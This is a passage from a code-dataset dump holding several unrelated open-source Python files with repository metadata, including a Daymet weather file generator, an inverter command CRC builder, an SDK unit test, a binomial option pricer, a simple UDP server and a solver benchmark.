range(end_yr - init_yr + 1)]\n        payload = {\n            \"lat\": lat,\n            \"lon\": lon,\n            \"vars\": \",\".join(attributes),\n            \"years\": \",\".join(year_arr),\n        }\n        req = requests.get(DAYMET_URL, params=payload)\n        spinup_df = pd.read_csv(io.StringIO(req.text), sep=\",\", header=6)\n\n        wth_df = pd.DataFrame()\n        wth_df[\"year\"] = spinup_df[\"year\"]\n        wth_df[\"day\"] = spinup_df[\"yday\"]\n        wth_df[\"dayL\"] = spinup_df[\"dayl (s)\"] / 3600\n        wth_df[\"radn\"] = (\n            spinup_df[\"srad (W/m^2)\"] * spinup_df[\"dayl (s)\"] / 3600 * 0.0036\n        )\n        wth_df[\"maxt\"] = spinup_df[\"tmax (deg c)\"]\n        wth_df[\"mint\"] = spinup_df[\"tmin (deg c)\"]\n        wth_df[\"prcp\"] = spinup_df[\"prcp (mm/day)\"]\n        wth_df[\"swe\"] = spinup_df[\"swe (kg/m^2)\"]\n        wth_df[\"vp\"] = spinup_df[\"vp (Pa)\"] * 0.001\n        wth_df[\"rain\"] = 0.0\n        wth_df[\"snow\"] = 0.0\n\n        # check for leap years\n        for lp_yr in leap_years:\n            lp_day = wth_df.loc[\n                (wth_df[\"year\"] == lp_yr) & (wth_df[\"day\"] == 365)\n            ].copy(deep=True)\n            lp_day[\"day\"] = 366\n            lp_day[\"yday\"] = 366\n\n            wth_df = wth_df.append(lp_day, ignore_index=True, sort=False)\n\n        wth_df = wth_df.sort_values(by=[\"year\", \"day\"])\n\n        # check if snow-water equivalent increases next day\n        for idx, row in wth_df.iterrows():\n            if idx == 0:\n                wth_df.loc[idx:idx, \"snow\"] = 0.0\n                wth_df.loc[idx:idx, \"rain\"] = row[\"prcp\"]\n                continue\n            elif idx == len(wth_df) - 1:\n                wth_df.loc[idx:idx, \"snow\"] = 0.0\n                wth_df.loc[idx:idx, \"rain\"] = row[\"prcp\"]\n                continue\n            else:\n                cur = row[\"swe\"]\n                next = wth_df.iloc[idx + 1][\"swe\"]\n                if next > cur:\n                    wth_df.loc[idx:idx, \"snow\"] = row[\"prcp\"]\n                    wth_df.loc[idx:idx, \"rain\"] = 0.0\n                elif (next > 0.0) & (next == cur):\n                    wth_df.loc[idx:idx, \"snow\"] = row[\"prcp\"]\n                    wth_df.loc[idx:idx, \"rain\"] = 0.0\n                else:\n                    wth_df.loc[idx:idx, \"snow\"] = 0.0\n
wth_df.loc[idx:idx, \"rain\"] = row[\"prcp\"]\n\n wth_df = wth_df[\n [\n \"year\",\n \"day\",\n \"radn\",\n \"maxt\",\n \"mint\",\n \"rain\",\n \"snow\",\n \"vp\",\n \"dayL\",\n ]\n ]\n\n self.data = wth_df.append(self.data, sort=False)\n self.data = self.data.round(2)\n\n\ndef create_excel_met(\n lat, long, start_year, end_year, met_name, tar_folder=\"apsim_files/met\"\n):\n \"\"\"Creates Daymet met file as an Excel spreadsheet.\n\n Args:\n lat (int): Latitude of single pixel to extract weather data for.\n long (int): Longitude of single pixel to extract weather data for.\n start_year (int): Starting year of met data to get.\n end_year (int): Ending year of met data to get.\n met_name (str): Name of met file to write.\n tar_folder (str, optional): Target folder to write met file to. Defaults to 'apsim_files/met'.\n \"\"\"\n if not os.path.exists(tar_folder):\n os.makedirs(tar_folder)\n wth_obj = Weather().from_daymet(lat, long, start_year, end_year)\n wth_df = wth_obj.data\n tav = round(wth_df[\"maxt\"].mean(), 1)\n amp = round(wth_df[\"maxt\"].max(), 1)\n # greene_df.to_excel('greene.xlsx', index=False)\n wb = Workbook()\n ws = wb.active\n ws.alignment = Alignment(horizontal=\"left\")\n for r in dataframe_to_rows(wth_df, index=False, header=True):\n ws.append(r)\n for cells in ws.iter_rows():\n for cell in cells:\n cell.alignment = Alignment(horizontal=\"left\")\n ws.insert_rows(2)\n ws[\"A2\"] = \"()\"\n ws[\"B2\"] = \"()\"\n ws[\"C2\"] = \"(MJ/m2)\"\n ws[\"D2\"] = \"(oC)\"\n ws[\"E2\"] = \"(oC)\"\n ws[\"F2\"] = \"(mm)\"\n ws[\"G2\"] = \"(mm)\"\n ws[\"H2\"] = \"(kPa)\"\n ws[\"I2\"] = \"(hours)\"\n ws.insert_rows(1)\n ws[\"A1\"] = \"!Weather generated using C-CHANGE Foresite framework\"\n ws.insert_rows(1)\n ws[\"A1\"] = f\"amp = {amp}\"\n ws.insert_rows(1)\n ws[\"A1\"] = f\"tav = {tav}\"\n ws.insert_rows(1)\n ws[\"A1\"] = f\"longitude = {long} (DECIMAL DEGREES)\"\n ws.insert_rows(1)\n ws[\"A1\"] = f\"latitude = {lat} (DECIMAL DEGREES)\"\n ws.insert_rows(1)\n ws[\"A1\"] = \"stationname = Daymet weather\"\n ws.insert_rows(1)\n ws[\"A1\"] = \"[weather.met.weather]\"\n full_path = os.path.join(tar_folder, f\"{met_name}.xlsx\")\n wb.save(full_path)\n\n\n\"\"\"\nGet the weather for given centroid and write to a .met file\n\nArgs:\n lat {float} -- latitude of centroid\n long {float} -- longitude of centroid\n year_star {int} -- starting year of weather data\n year_end {int} -- ending year of weather data\n path {str} -- path to write the met files\n filename {str} -- name to give the .met file\n\nReturns:\n None\n\"\"\"\n\n\ndef create_met(\n lat, long, start_year, end_year, filename, path=\"apsim_files/met_files\"\n):\n weather_obj = Weather().from_daymet(lat, long, start_year, end_year)\n weather_obj.write_met_file(f\"{path}/{filename}.met\")\n","repo_name":"isuforesite/Foresite","sub_path":"src/foresite/apsim/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":20851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"16473620558","text":"import crc16\n\n\nclass Command:\n def __init__(self, command):\n self.command = command\n self.hex_command = []\n self.command_split = [char for char in command]\n self.command_encoded = command.encode()\n self.crc_string = hex(crc16.crc16xmodem(self.command_encoded))\n self.crc_int = int(self.crc_string, 16)\n self.crc_high, self.crc_low = divmod(self.crc_int, 0x100)\n\n def convert_tohex(self):\n hex_list = []\n for char in self.command_split:\n char = ord(char)\n 
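            # Aside: an illustrative usage sketch for the Command class;
            # "QPIGS" is a hypothetical query string, and 'crc16' is the
            # PyPI package already imported above:
            #
            #     cmd = Command("QPIGS")
            #     cmd.build_command()
            #     frame = bytes(cmd.hex_command)
            #     # frame == ASCII payload + CRC16/XMODEM (high, low) + 0x0D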
hex_list.append(char)\n self.hex_command.append(char)\n return hex_list\n\n def append_crc(self):\n self.hex_command.append(self.crc_high)\n self.hex_command.append(self.crc_low)\n\n def append_delim(self):\n self.hex_command.append(13)\n\n def build_command(self):\n self.convert_tohex()\n self.append_crc()\n self.append_delim()\n","repo_name":"KyleBotha/axpert-command-library","sub_path":"AxpertPy/CalculateCommands.py","file_name":"CalculateCommands.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21452455391","text":"from typing import Dict\n\nimport pytest\n\nfrom demisto_sdk.commands.common.content.objects.pack_objects.pack import Pack\nfrom demisto_sdk.commands.convert.converters.layout.layout_base_converter import (\n LayoutBaseConverter,\n)\n\n\nclass TestLayoutBaseConverter:\n CREATE_LAYOUT_DICT_INPUTS = [\n (dict(), {\"version\": -1}),\n (\n {\n \"from_version\": \"4.1.0\",\n \"to_version\": \"5.9.9\",\n \"kind\": \"quickView\",\n \"type_id\": \"ExtraHop Incident\",\n },\n {\n \"fromVersion\": \"4.1.0\",\n \"toVersion\": \"5.9.9\",\n \"version\": -1,\n \"kind\": \"quickView\",\n \"typeId\": \"ExtraHop Incident\",\n },\n ),\n (\n {\"from_version\": \"6.0.0\", \"layout_id\": \"ExtraHop Incident\"},\n {\n \"fromVersion\": \"6.0.0\",\n \"name\": \"ExtraHop Incident\",\n \"id\": \"ExtraHop Incident\",\n \"version\": -1,\n },\n ),\n ]\n\n @pytest.mark.parametrize(\"inputs, expected\", CREATE_LAYOUT_DICT_INPUTS)\n def test_create_layout_dict(self, inputs: Dict, expected: Dict):\n \"\"\"\n Given:\n - List of fields of layouts with their values.\n\n When:\n - Creating a new dict representing a layout file.\n\n Then:\n - Ensure the expected dict is created.\n \"\"\"\n assert LayoutBaseConverter.create_layout_dict(**inputs) == expected\n\n def test_get_layout_dynamic_fields(self, tmpdir):\n \"\"\"\n Given:\n - Schema path of the layouts-container.\n\n When:\n - Wanting to retrieve all dynamic fields in the schema.\n\n Then:\n - Ensure dynamic fields are returned.\n \"\"\"\n dynamic_fields = set(\n LayoutBaseConverter(Pack(tmpdir)).get_layout_dynamic_fields().keys()\n )\n assert dynamic_fields == {\n \"close\",\n \"details\",\n \"detailsV2\",\n \"edit\",\n \"indicatorsDetails\",\n \"indicatorsQuickView\",\n \"mobile\",\n \"quickView\",\n }\n","repo_name":"demisto/demisto-sdk","sub_path":"demisto_sdk/commands/convert/converters/layout/tests/layout_base_converter_test.py","file_name":"layout_base_converter_test.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"52"} +{"seq_id":"39512881355","text":"'''\n编写一种方法,对字符串数组进行排序,将所有变位词组合在一起。变位词是指字母相同,但排列不同的字符串。\n\n注意:本题相对原题稍作修改\n\n示例:\n\n输入: [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"],\n输出:\n[\n [\"ate\",\"eat\",\"tea\"],\n [\"nat\",\"tan\"],\n [\"bat\"]\n]\n说明:\n\n所有输入均为小写字母。\n不考虑答案输出的顺序。\n'''\n\nclass Solution(object):\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n position = {}\n result = []\n count = 0\n for term in strs:\n sorted_term = \"\".join(sorted(term))\n if sorted_term not in position.keys():\n result.append([term])\n position[sorted_term] = count\n count += 1\n else:\n result[position[sorted_term]].append(term)\n return result","repo_name":"oscarhscc/algorithm-with-python","sub_path":"程序员面试经典/面试题 10.02. 变位词组.py","file_name":"面试题 10.02. 
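# Aside: an equivalent, more idiomatic grouping for the groupAnagrams
# solution above, keyed on the sorted word (illustrative only):
#
#     from collections import defaultdict
#
#     def group_anagrams(strs):
#         groups = defaultdict(list)
#         for word in strs:
#             groups["".join(sorted(word))].append(word)
#         return list(groups.values())
#
#     # group_anagrams(["eat", "tea", "tan", "ate", "nat", "bat"])
#     # -> [["eat", "tea", "ate"], ["tan", "nat"], ["bat"]]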
变位词组.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32433153836","text":"import turtle\n\npen = turtle.Turtle()\npen.speed(5)\n\ndef ct(order, size):\n \"\"\"\n Make turtle draw a Cesaro torn line fractal of 'order' and 'size'.\n \"\"\"\n if order == 0: # The base case is just a straight line\n pen.forward(size)\n else:\n for angle in [-85, 170, -85, 0]:\n ct(order - 1, size / 3)\n pen.left(angle)\n\nct(3, 200)","repo_name":"flaco99/Statistics-Course","sub_path":"cs12/recursive/Cesaro_torn_line_fractal.py","file_name":"Cesaro_torn_line_fractal.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70531581285","text":"#!/usr/bin/env python2\n# bench.py\n# (c) Daniel Bershatsky, 2016\n# See LISENCE for details.\n\nfrom __future__ import print_function\nfrom argparse import ArgumentParser\nfrom sys import path\n\npath.append('..')\n\nfrom nls.model import Problem\nfrom nls.pumping import GaussianPumping2D\n\nfrom numpy import polyfit, polyval, linspace\nfrom scipy.io import savemat, loadmat\nfrom seaborn import color_palette\nfrom matplotlib.pyplot import figure, show\n\n\ndef create_model(num_nodes=200, num_iters=2000, order=5):\n return Problem().model(\n model = '2d',\n dx = 2.0e-1,\n dt = 2.0e-3,\n t0 = 0.0,\n u0 = 0.1,\n order = order,\n num_nodes = num_nodes,\n num_iters = num_iters,\n pumping = GaussianPumping2D(power=15.0, variation=3.14),\n original_params = {\n 'R': 0.0242057488654,\n 'gamma': 0.0242057488654,\n 'g': 0.00162178517398,\n 'tilde_g': 0.0169440242057,\n 'gamma_R': 0.242057488654\n })\n\ndef bench_num_nodes():\n nodes = [50, 100, 200, 300, 400, 500, 700, 1000]\n times = []\n\n for i, num_nodes in enumerate(nodes):\n model = create_model(num_nodes=num_nodes)\n solution = model.solve()\n solution.report()\n times.append(solution.getElapsedTime())\n\n savemat('nodes.mat', {'nodes': nodes, 'times': times})\n\ndef bench_num_iters():\n iters = range(500, 5001, 500)\n times = []\n\n for i, num_iters in enumerate(iters):\n model = create_model(num_iters=num_iters)\n solution = model.solve()\n solution.report()\n times.append(solution.getElapsedTime())\n\n savemat('iters.mat', {'iters': iters, 'times': times})\n\ndef bench_orders():\n orders = [3, 5, 7]\n nodes = [200, 400]\n times = [[], []]\n\n for i, num_nodes in enumerate(nodes):\n for j, order in enumerate(orders):\n model = create_model(num_nodes=num_nodes, order=order)\n solution = model.solve()\n solution.report()\n times[i].append(solution.getElapsedTime())\n\n savemat('orders.mat', {'orders': orders, 'nodes': nodes, 'times': times})\n\ndef visualize(filenames=('nodes.mat', 'iters.mat', 'orders.mat')):\n nodes_mat = loadmat(filenames[0])\n iters_mat = loadmat(filenames[1])\n orders_mat = loadmat(filenames[2])\n\n palette = color_palette('muted')\n\n # curve fitting\n nodes = linspace(min(nodes_mat['nodes'][0]), max(nodes_mat['nodes'][0]), 50)\n nodes_poly = polyfit(list(nodes_mat['nodes'][0]) + [0.0], list(nodes_mat['times'][0]) + [0.0], 2)\n\n iters = linspace(min(iters_mat['iters'][0]), max(iters_mat['iters'][0]), 50)\n iters_poly = polyfit(iters_mat['iters'][0], iters_mat['times'][0], 1)\n\n # plotting\n\n fig = figure(figsize=(17, 6))\n\n ax = fig.add_subplot(1, 3, 1)\n ax.plot(nodes_mat['nodes'][0], nodes_mat['times'][0], 'o-', label='exp')\n ax.plot(nodes, polyval(nodes_poly, nodes), label='fit')\n 
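    # Aside: the fit above appends an artificial (0, 0) sample so the
    # least-squares quadratic passes near the origin. A self-contained
    # sketch with hypothetical timings (illustrative only):
    #
    #     from numpy import polyfit, polyval
    #     xs = [50, 100, 200, 0.0]     # grid sizes plus the artificial origin
    #     ts = [0.9, 3.7, 14.8, 0.0]   # run times in seconds (hypothetical)
    #     coeffs = polyfit(xs, ts, 2)  # quadratic, as in the fit above
    #     t_300 = polyval(coeffs, 300) # predicted time for a 300x300 grid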
ax.set_ylim(0.0)\n ax.set_xlabel('nodes')\n ax.set_ylabel('time, s')\n ax.legend(loc='best')\n\n ax = fig.add_subplot(1, 3, 2)\n ax.plot(iters_mat['iters'][0], iters_mat['times'][0], 'o-', label='exp')\n ax.plot(iters, polyval(iters_poly, iters), label='fit')\n ax.set_xlabel('iterations')\n ax.set_ylabel('time, s')\n ax.legend(loc='best')\n\n ax = fig.add_subplot(1, 3, 3)\n ax.bar(orders_mat['orders'][0] + 0.2, orders_mat['times'][0], color=palette[0], label='200x200')\n ax.bar(orders_mat['orders'][0] + 1.0, orders_mat['times'][1], color=palette[1], label='400x400')\n ax.set_xlabel('approximation order')\n ax.set_ylabel('time, s')\n ax.set_xticks((4, 6, 8))\n ax.set_xticklabels((3, 5, 7))\n ax.legend(loc='best')\n \n fig.savefig('benchmark.png')\n show()\n\ndef main():\n parser = ArgumentParser(prog='benchmark.py', description='Test perfomance.')\n parser.add_argument('--only-bench', action='store_true')\n parser.add_argument('--only-show', action='store_true')\n\n args = parser.parse_args()\n\n if args.only_bench and args.only_show:\n parser.print_help()\n parser.exit()\n\n if args.only_bench:\n bench_num_nodes()\n bench_num_iters()\n bench_orders()\n\n if args.only_show:\n visualize()\n\n\nif __name__ == '__main__':\n main()","repo_name":"daskol/nls","sub_path":"benchmark/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"72911627366","text":"#UDP Server side\nimport socket\nenv=''\nip_address = \"\"\n\n#Create a server side socket IPv4 (AF_INET) and UDP (SOCK_DGRAM)\nserver_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n\n# Bind the socket to a specific tuple (IP address and port)\nif env == \"PRODUCTION\":\n ip_address = socket.gethostbyname(socket.gethostname())\n\nserver_socket.bind((ip_address, 12345))\n\n#We are not listening or accepting connections since UDP is a connectionless protocol\n\nmessage, address = server_socket.recvfrom(10)\nprint(message.decode(\"utf-8\"))\nprint(address)\n\nmessage, address = server_socket.recvfrom(10)\nprint(message.decode(\"utf-8\"))\nprint(address)","repo_name":"KMaster90/python_socket_examples","sub_path":"01_socket_intro/udp_server.py","file_name":"udp_server.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22001487167","text":"import os\nimport numpy as np\nfrom optimisers import columns\nfrom optimisers.abstract_result import AbstractResult\nfrom optimisers.timer import Timer\n\n# Initialise default column types added to a Result object\nDEFAULT_COLUMN_TYPES = [\n columns.Iteration,\n columns.Time,\n columns.TrainError,\n columns.TestError\n]\n\nclass Result(AbstractResult):\n \"\"\"\n Class to store the results of optimisation in a single object which can be\n passed directly to plotting and/or analysis functions. Also contains\n methods for updating and displaying results.\n\n NOTE: saving and loading of Result objects is currently deprecated, because\n due to updating this module with Column objects, implementing saving and\n loading of Result objects in npz files would currently require more effort\n to develop than is worthwhile. Alternative are to manually extract\n value_lists from each column and save those in a npz file, or just pickle\n the whole Result object. 
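    A minimal pickling sketch (illustrative; `result` stands for any
    populated Result instance):

        import pickle
        with open("result.pkl", "wb") as f:
            pickle.dump(result, f)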
TODO: implement saving and loading of Result\n objects\n \"\"\"\n def __init__(\n self,\n name=None,\n verbose=True,\n file=None,\n add_default_columns=True\n ):\n \"\"\" Store the name of the experiment (which is useful later when\n displaying results), verbosity, output file, and initialise list of\n columns, and dictionary mapping types of columns to their instances. If\n specified by the input argument, then add default columns to this Result\n object. \"\"\"\n self.name = name if (name is not None) else \"Unnamed experiment\"\n self.file = file\n self.verbose = verbose\n self._column_list = list()\n self._column_dict = dict()\n self._iteration = 0\n self.begun = False\n if add_default_columns:\n self._add_default_columns()\n self._init_timer()\n\n def _add_default_columns(self):\n for col in DEFAULT_COLUMN_TYPES:\n self.add_column(col())\n\n def add_column(self, column):\n if type(column) in self._column_dict:\n raise ValueError(\"A column with this name has already been added\")\n\n self._column_list.append(column)\n self._column_dict[type(column)] = column\n\n def replace_column(self, column):\n \"\"\" Replace a column belonging to this result object with a different\n column (provided as an argument) of the same type. If no column of the\n same type belongs to this object already, then a new one is simply\n added \"\"\"\n # Delete the column from this result object, if it exists already\n if type(column) in self._column_dict:\n existing_column = self._column_dict[type(column)]\n self._column_list.remove(existing_column)\n\n # Add the new column\n self._column_list.append(column)\n self._column_dict[type(column)] = column\n\n\n def get_iteration_number(self):\n \"\"\" Return the current iteration number, as an integer \"\"\"\n return self._iteration\n\n def get_values(self, column_type):\n \"\"\" Given the type of column, return the list of values for the column\n with the matching type.\n\n Raises KeyError if this Result object does not have a Column with a\n matching type. \"\"\"\n return self._column_dict[column_type].value_list\n\n def get_final_train_reconstruction_error(self):\n \"\"\" Return the final mean reconstruction error of the model on the\n training set \"\"\"\n return self._column_dict[columns.TrainError].value_list[-1]\n\n def get_column_name(self, column_type):\n \"\"\" Given the type of column, return the name of the column with the\n matching type.\n\n Raises KeyError if this Result object does not have a Column with a\n matching type. 
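        Usage sketch (illustrative; assumes a populated Result instance
        `result` and the column types from optimisers.columns):

            name = result.get_column_name(columns.TrainError)
            errs = result.get_values(columns.TrainError)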
\"\"\"\n return self._column_dict[column_type].name\n\n def begin(self):\n \"\"\" Display column headers for the columns in this result (if this\n result object is verbose, and these column headers have not already\n been displayed by calling this method previously), and if this result\n does not have a timer object, then add a timer object, and tell it to\n begin.\n\n If a specific timer object is to be added to this Result class, which\n can be done using the set_timer method (inherited from the TimedObject\n class via the AbstractResult class), then the set_timer method should\n be called before this method (Result.begin), in order to avoid\n unnecessarily initialising an extra timer object \"\"\"\n if self.verbose:\n self.display_headers()\n\n if not self.has_timer():\n timer = Timer()\n self.set_timer(timer)\n timer.begin()\n\n self.begun = True\n\n def update(self, **kwargs):\n \"\"\" Update all the columns in this Result object with new values.\n Depending on the columns used by this object, certain keyword arguments\n will be required; if the default columns are used, then the keyword\n arguments model, dataset, and iteration will be required. The begin\n method must be called before the update method, otherwise an\n AttributeError is raised. \"\"\"\n kwargs[\"time\"] = self.time_elapsed()\n self._iteration = kwargs.get(\"iteration\")\n\n for col in self._column_list:\n col.update(kwargs)\n\n if self.verbose:\n self._display_last()\n\n def display_headers(self):\n title_list = [col.title_str for col in self._column_list]\n print(\"\\nPerforming test \\\"{}\\\"...\".format(self.name), file=self.file)\n print(\" | \".join(title_list), file=self.file)\n print(\" | \".join(\"-\" * len(t) for t in title_list), file=self.file)\n\n def _display_last(self):\n \"\"\"\n Display the results of the last time the update method was called.\n Raises IndexError if update has not been called on this object before\n \"\"\"\n print(\n \" | \".join(col.get_value_str() for col in self._column_list),\n file=self.file\n )\n\n def display_summary(self, n_iters):\n t_total = self.time_elapsed()\n t_mean = t_total / n_iters\n print(\n \"-\" * 50,\n \"{:30} = {}\".format(\"Test name\", self.name),\n \"{:30} = {:,.4f} s\".format(\"Total time\", t_total),\n \"{:30} = {:,}\".format(\"Total iterations\", n_iters),\n \"{:30} = {:.4f} ms\".format(\n \"Average time per iteration\",\n 1e3 * t_mean\n ),\n \"{:30} = {:,.1f}\".format(\n \"Average iterations per second\",\n 1 / t_mean\n ),\n sep=\"\\n\",\n end=\"\\n\\n\",\n file=self.file\n )\n\n def __repr__(self):\n return \"Result({})\".format(repr(self.name))\n","repo_name":"jakelevi1996/backprop2","sub_path":"optimisers/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":6852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5043377464","text":"\"\"\"\r\nPython code to implement a multi-step binomial tree to price the\r\noption in both American and European cases\r\nAuthor: Azam Jainullabudin Mohamed\r\n\"\"\"\r\nimport numpy as np\r\nimport math\r\n\r\n# Input from the question\r\nr=0.04; # risk\r\nvolatility=0.2; # Volatility\r\ntime=2; # time\r\n#n=5; # input trees\r\n\r\n\r\n# Function for evaluating the binomial option pricing\r\n# for both European and American options\r\ndef binomial_tree(n, option):\r\n # Change in time based upon the value \r\n dtime=time/n;\r\n # Up value\r\n u=np.exp(volatility*math.sqrt(dtime))\r\n # Down value\r\n d=1/u\r\n \r\n # probability value\r\n 
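    # Aside: this is the standard CRR risk-neutral probability. p solves
    #     p*u + (1-p)*d = exp(r*dtime)
    # so p = (exp(r*dtime) - d) / (u - d). For example, with r=0.04,
    # volatility=0.2 and n=2 steps over time=2 (dtime=1):
    # u ~= 1.2214, d ~= 0.8187, p ~= 0.5515.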
p=(np.exp(r*dtime)-d)/(u-d);\r\n \r\n # Initial stock value\r\n S0=[[42]]\r\n \r\n # To calculate the nodes values for n binomial tree\r\n for j in range(1,n+1):\r\n temp=[]\r\n for i in range(1,j+2):\r\n s=S0[0][0]*(u**(i-1))*(d**(j-(i-1)))\r\n temp.insert(j,s);\r\n S0.insert(i,temp)\r\n print(\"**********************************************\")\r\n print(\"Current stock price in %d binomial option tree\" % n)\r\n print(\"**********************************************\")\r\n print(S0)\r\n print(\" \")\r\n \r\n # Initializing new matrix to store the payoff values in american option\r\n new_mat=np.zeros([n+1,n+1])\r\n # Initialing matrix for comparing the values of payoff and f(ni)\r\n # to manipulate the early exercise optimal node\r\n early=np.zeros([n+1,n+1])\r\n # Matrix to store the f(ni) values at each node\r\n options=np.zeros([n+1,n+1])\r\n # Matrix containing the updated values of nodes in n binomial tree\r\n f_value=np.zeros([n+1, n+1])\r\n \r\n # Excercising the european and American option\r\n flag = 0\r\n for i in range(n,-1,-1):\r\n for j in range(0, i+1):\r\n # Exercising \"European\" option pricing\r\n if(option == \"European\" or option == \"european\" or option == \"E\" or option == \"e\"):\r\n if(i == n):\r\n payoff = max(1500-(S0[i][j]**2)+(30*S0[i][j]), 0)\r\n options[i,j] = payoff\r\n # Condition to calculate the payoff at the last column\r\n elif( i != n): \r\n options[i,j] = np.exp(-r * dtime)* ((1-p) * options[i+1, j] + p* options[i+1, j+1])\r\n \r\n # Exercising \"American\" option pricing\r\n if(option == \"American\" or option == \"american\" or option == \"A\" or option == \"a\"):\r\n if(flag == 1):\r\n american_payoff = max(1500-(S0[i][j]**2)+(30*S0[i][j]), 0)\r\n new_mat[i,j] = american_payoff\r\n if(i == n):\r\n payoff = max(1500-(S0[i][j]**2)+(30*S0[i][j]), 0)\r\n options[i,j] = payoff\r\n # Condition to calculate the payoff at the last column\r\n elif(i != n):\r\n payoff = max(1500-(S0[i][j]**2)+(30*S0[i][j]), 0)\r\n f_value[i,j] = np.exp(-r * dtime)* ((1-p) * options[i+1, j] + p* options[i+1, j+1])\r\n options[i,j] = max(payoff, f_value[i,j])\r\n \r\n # Validating the optimal node for early exercise option\r\n if(new_mat[i,j] >= options[i,j] and new_mat[i,j] != 0 and options[i,j] != 0):\r\n early[i,j] = new_mat[i,j]\r\n elif(new_mat[i, j] != options[i,j]):\r\n early[i,j] = 0\r\n flag=1\r\n \r\n print(\"\")\r\n # Printing the F(ni) values by exercising European option pricing\r\n if(option == \"European\" or option == \"european\" or option == \"E\" or option == \"e\"):\r\n print(\"********************************************\")\r\n print(\"European option pricing for %d step binomial\" % n)\r\n print(\"********************************************\")\r\n print(options)\r\n \r\n # Printing the F(ni) values by exercising American option pricing\r\n elif(option == \"American\" or option == \"american\" or option == \"A\" or option == \"a\"):\r\n print(\"***************************************************\")\r\n print(\"American option pricing for %d step binomial\" % n)\r\n print(\"**************************************************\")\r\n print(options)\r\n #print(\"YES\")\r\n #print(f_value)\r\n\r\n print(\"\")\r\n print(\"**************************************************\")\r\n print(\"American option payoff values for %d step binomial\" % n)\r\n print(\"**************************************************\")\r\n print(new_mat)\r\n print(\"\")\r\n \r\n print(\"**** Comparing the payoff matrix with option matrix for \", end=\"\")\r\n print(\"calculating the 
optimal option for early excercise ****\")\r\n print(\"\")\r\n print(\"***********************************************\")\r\n print(\"Nodes at which early exercise can be beneficial\")\r\n print(\"***********************************************\")\r\n # To print the Optimal early exercise option\r\n for i in range(n,-1,-1):\r\n for j in range(0, i+1):\r\n if(early[i,j] != 0):\r\n print(\"Early exercise value is optimal at node value\", end=\" \")\r\n print(i, end= \" \")\r\n print(j, end=\" \")\r\n print(\"is\", end= \" \")\r\n print(early[i,j])\r\n\r\n# Start of the program\r\n# Function call to binomial tree\r\n# Exercising the binomial tree with European option\r\nprint(\"Enter the step of binomial tree\")\r\nn = int(input())\r\nprint(\"```````` EUROPEAN OPTION ````````\")\r\nbinomial_tree(n, \"European\")\r\nprint(\"\")\r\n# Exercising the binomial tree with American option\r\nprint(\"```````` AMERICAN OPTION ````````\")\r\nbinomial_tree(n, \"American\")","repo_name":"AzamJM/Option-pricing-using-Python","sub_path":"Option_pricing.py","file_name":"Option_pricing.py","file_ext":"py","file_size_in_byte":5712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43764671057","text":"from django.urls import path, re_path\r\nfrom wordload import views\r\n\r\n\r\nurlpatterns = [\r\n re_path('^deploy/$',views.deploy,name='deploy'),\r\n re_path('^deploy_api/$',views.deploy_api,name='deploy_api'),\r\n re_path('^ds/$', views.ds, name='ds'),\r\n re_path('^ds_api/$', views.ds_api, name='ds_api'),\r\n re_path('^sts/$', views.sts, name='sts'),\r\n re_path('^sts_api/$', views.sts_api, name='sts_api'),\r\n re_path('^pods/$', views.pods, name='pods'),\r\n re_path('^pods_api/$', views.pods_api, name='pods_api'),\r\n\r\n]\r\n","repo_name":"MinKo-e/k8s-dashboard","sub_path":"wordload/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9927023955","text":"import os, sys\nimport argparse\nimport logging\nimport pprint\n\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport cyanure as cyan\nimport torchvision.transforms as transforms\n\nimport src.deit as deit\nimport src.resnet50 as resnet_models\nfrom clip.model import VisionTransformer, ModifiedResNet\n\nfrom src.utils import load_pretrained\nfrom src.data_manager import init_data as init_inet_data\nfrom src.wilds_loader import init_data as init_wilds_data\n\nlogging.basicConfig()\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n '--mask', type=float,\n default=0.0,\n help='regularization')\nparser.add_argument(\n '--preload', action='store_true',\n help='whether to preload embs if possible')\nparser.add_argument(\n '--fname', type=str,\n help='model architecture')\nparser.add_argument(\n '--model-name', type=str,\n help='model architecture')\nparser.add_argument(\n '--pretrained', type=str,\n help='path to pretrained model',\n default='')\nparser.add_argument(\n '--device', type=str,\n default='cuda:0',\n help='device to run script on')\nparser.add_argument(\n '--normalize', type=bool,\n default=True,\n help='whether to standardize images before feeding to nework')\nparser.add_argument(\n '--root-path-train', type=str,\n default='../datasets/',\n help='root directory to training data')\nparser.add_argument(\n '--image-folder-train', type=str,\n default='ImageNet/',\n help='image directory 
